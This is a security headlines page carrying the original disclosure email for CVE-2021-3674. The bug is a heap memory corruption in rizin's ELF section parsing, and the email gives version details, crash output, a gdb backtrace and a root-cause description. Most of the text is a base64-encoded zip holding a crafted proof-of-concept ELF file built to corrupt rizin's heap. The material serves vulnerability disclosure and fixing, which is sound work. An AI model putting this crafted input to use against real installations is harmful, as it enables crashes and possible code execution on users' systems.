Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-3674: report.txt

A flaw was found in rizin. The create_section_from_phdr function allocates space for ELF section data by processing the headers. Crafted values in the headers can cause out of bounds reads, which can lead to memory corruption and possibly code execution through the binary object’s callback function.

CVE
#web#linux#nodejs#js#git#kubernetes#pdf#i2p

From: [email protected] [email protected] To: [email protected] [email protected] [ Memory Corruption in vector_free_elems ] Hi, I am writing to inform you of a bug in vector_free_elems when parsing an ELF with corrupted section headers. [ VERSION ]--------------------------------------------------------------------- user@xooted:~$ rizin -v rizin 0.3.0-git @ linux-x86-64 commit: f2c593d223df71fd54bee7224963598d8f9676ef, build: 2021-07-12__01:15:14 user@xooted:~$ rizin POC.bin WARNING: Cannot initialize section strings table WARNING: invalid section offset.Segmentation fault (core dumped) user@xooted:~$ rz-bin -I POC.bin WARNING: Cannot initialize section strings table WARNING: invalid section offset.Segmentation fault (core dumped) [ BACKTRACE ]------------------------------------------------------------------- #0 __GI___libc_free (mem=0xacabacabacabacab) at malloc.c:3102 #1 0x00007ffff7d1872d in vector_free_elems (vec=0x5555556ab220) at …/librz/include/rz_vector.h:89 #2 rz_vector_clear (vec=0x5555556ab220) at …/librz/util/vector.c:70 #3 0x00007ffff7d187f2 in rz_vector_fini (vec=0x5555556ab220) at …/librz/util/vector.c:63 #4 0x00007ffff7d18842 in rz_vector_free (vec=0x5555556ab220) at …/librz/util/vector.c:77 #5 0x00007ffff6ccf2a2 in get_sections_from_dt_dynamic (bin=0x5555556843c0) at …/librz/bin/format/elf/elf_sections.c:161 #6 Elf64_rz_bin_elf_convert_sections (bin=bin@entry=0x5555556843c0, sections=sections@entry=0x0) at …/librz/bin/format/elf/elf_sections.c:329 #7 0x00007ffff6cc4cd9 in rz_bin_elf_init_shdr (sections=0x0, bin=0x5555556843c0) at …/librz/bin/format/elf/elf.c:347 #8 rz_bin_elf_init (bin=0x5555556843c0) at …/librz/bin/format/elf/elf.c:347 #9 Elf64_rz_bin_elf_new_buf (buf=<optimized out>) at …/librz/bin/format/elf/elf.c:381 #10 0x00007ffff6c9df30 in load_buffer (bf=<optimized out>, bin_obj=0x555555684b90, buf=<optimized out>, loadaddr=<optimized out>, sdb=<optimized out>) at …/librz/bin/p/bin_elf.inc:82 #11 0x00007ffff6c8b131 in rz_bin_object_new (bf=bf@entry=0x555555684920, plugin=plugin@entry=0x5555555958e0, opts=opts@entry=0x7ffffff9c5c8, offset=offset@entry=0x0, sz=<optimized out>) at …/librz/bin/bobj.c:271 #12 0x00007ffff6c87f8c in rz_bin_file_new_from_buffer (bin=bin@entry=0x555555590eb0, file=<optimized out>, buf=buf@entry=0x555555684d70, rawstr=<optimized out>, opts=opts@entry=0x7ffffff9c5c8, fd=<optimized out>, pluginname=0x0) at …/librz/bin/bfile.c:551 #13 0x00007ffff6c7d384 in rz_bin_open_buf (bin=bin@entry=0x555555590eb0, buf=buf@entry=0x555555684d70, opt=opt@entry=0x7ffffff9c5c0) at …/librz/bin/bin.c:280 #14 0x00007ffff6c7d6ac in rz_bin_open_io (bin=bin@entry=0x555555590eb0, opt=opt@entry=0x7ffffff9c5c0) at …/librz/bin/bin.c:338 #15 0x00007ffff6c7d7db in rz_bin_open (bin=bin@entry=0x555555590eb0, file=file@entry=0x7fffffffe3c0 "POC.bin", opt=opt@entry=0x7ffffff9c5c0) at …/librz/bin/bin.c:230 #16 0x00007ffff7fa321e in rz_main_rz_bin (argc=<optimized out>, argv=0x7fffffffe088) at …/librz/main/rz-bin.c:1052 #17 0x00007ffff7db50b3 in __libc_start_main (main=0x555555555060 <main>, argc=0x3, argv=0x7fffffffe088, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe078) at …/csu/libc-start.c:308 #18 0x000055555555509e in _start () [ DESCRIPTION ]----------------------------------------------------------------- The vector_free_elems function iterates over the RzVectors created for different sections in the binary. The RzVector->free callback function rz_bin_elf_section_free makes a call to free() the RzBinElfSection->name member. With corrupted section headers, you can overwrite this pointer and other objects in the heap. https://github.com/rizinorg/rizin/blob/0e11486f36aa784b471d8d4ecf291a8d962b4c47/librz/util/vector.c#L54 https://github.com/rizinorg/rizin/blob/0e11486f36aa784b471d8d4ecf291a8d962b4c47/librz/bin/format/elf/elf_sections.c#L122 The POC below contains the pattern 0xacabacabacabacab at 0x9248 within the section headers which is free’d by vector_free_elems. [ POC ]------------------------------------------------------------------------- Attaching as a base64 encoded zip (POC.zip) containing POC.bin SHA256 Hashes e1394838d661abc9b7a71fa416a5d2df083e3d1616b1e8f6a0c70d2523a88eb0 POC.bin 43a75703a13f3f4ae1d9a394722ddfd348f03c1e7d9dee00040977c70641ad86 POC.zip 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 